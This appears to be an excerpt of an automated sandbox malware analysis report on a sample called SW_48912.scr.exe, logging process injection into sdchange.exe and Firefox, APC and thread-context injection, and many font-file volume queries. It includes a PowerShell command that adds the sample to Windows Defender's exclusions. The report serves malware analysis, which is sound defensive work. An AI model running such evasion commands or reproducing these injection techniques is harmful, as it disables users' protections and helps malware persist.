                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory written: C:\Users\user\Desktop\SW_48912.scr.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\sdchange.exeThread register set: target process: 7056Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\sdchange.exeThread APC queued: target process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Users\user\Desktop\SW_48912.scr.exe "C:\Users\user\Desktop\SW_48912.scr.exe"Jump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: kygSlzwdnMXWUy.exe, 00000009.00000002.3539047707.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000000.1963693324.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107539619.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: kygSlzwdnMXWUy.exe, 00000009.00000002.3539047707.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000000.1963693324.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107539619.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: kygSlzwdnMXWUy.exe, 00000009.00000002.3539047707.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000000.1963693324.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107539619.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: kygSlzwdnMXWUy.exe, 00000009.00000002.3539047707.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000000.1963693324.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107539619.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Users\user\Desktop\SW_48912.scr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
